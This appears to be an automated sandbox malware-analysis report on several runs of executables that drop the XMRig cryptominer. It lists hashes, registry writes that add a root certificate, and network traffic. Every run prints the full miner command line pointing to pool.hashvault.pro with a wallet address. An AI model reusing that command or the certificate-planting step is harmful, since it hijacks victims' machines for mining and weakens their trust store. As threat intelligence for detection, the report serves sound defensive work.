| US | 8.8.8.8:53 | 213.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3056-16-0x000001A810D40000-0x000001A810D60000-memory.dmp
memory/3056-17-0x000001A810D90000-0x000001A810DB0000-memory.dmp
memory/3056-18-0x00007FF76B280000-0x00007FF76BD83000-memory.dmp
memory/3056-19-0x000001A810DB0000-0x000001A810DD0000-memory.dmp
memory/3056-21-0x000001A810DD0000-0x000001A810DF0000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:04
Platform
win10v2004-20240426-en
Max time kernel
1799s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3772 wrote to memory of 2248 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3772 wrote to memory of 2248 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:04
Platform
win10v2004-20240226-en
Max time kernel
1797s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3960 wrote to memory of 1920 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3960 wrote to memory of 1920 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3720 --field-trial-handle=2252,i,16504368816373493055,9578615028378602855,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3860 --field-trial-handle=2252,i,16504368816373493055,9578615028378602855,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 13.107.253.64:443 | | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.239.69.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.179.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:04
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4840 wrote to memory of 916 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4840 wrote to memory of 916 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.141.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:04
Platform
win10v2004-20240508-en
Max time kernel
1800s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2820 wrote to memory of 4504 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2820 wrote to memory of 4504 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 19:41
Platform
win10v2004-20240426-en
Max time kernel
1798s
Max time network
1790s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [binary blob omitted] | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [binary blob omitted] | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2268 wrote to memory of 3148 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2268 wrote to memory of 3148 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 30.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:03
Platform
win10v2004-20240426-en
Max time kernel
1800s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [binary blob omitted] | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [binary blob omitted] | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1972 wrote to memory of 5324 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1972 wrote to memory of 5324 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
